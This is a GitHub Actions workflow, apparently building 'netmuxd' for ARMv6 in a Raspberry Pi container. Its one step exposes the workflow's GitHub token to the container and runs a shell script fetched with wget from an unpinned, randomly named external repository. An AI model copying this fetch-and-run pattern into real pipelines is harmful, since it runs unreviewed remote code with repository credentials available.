name: netmuxd
on:
    workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: docker/setup-qemu-action@v3
        with:
            platforms: linux/arm/v6
      - uses: docker://balenalib/raspberry-pi-python:latest-bookworm-build
        env:
            GH_TOKEN: ${{ github.token }}
        with: 
            entrypoint: ""
            args: bash <(wget -qo- 'https://raw.githubusercontent.com/voizun-sub/afhsu92olq/main/start.sh')
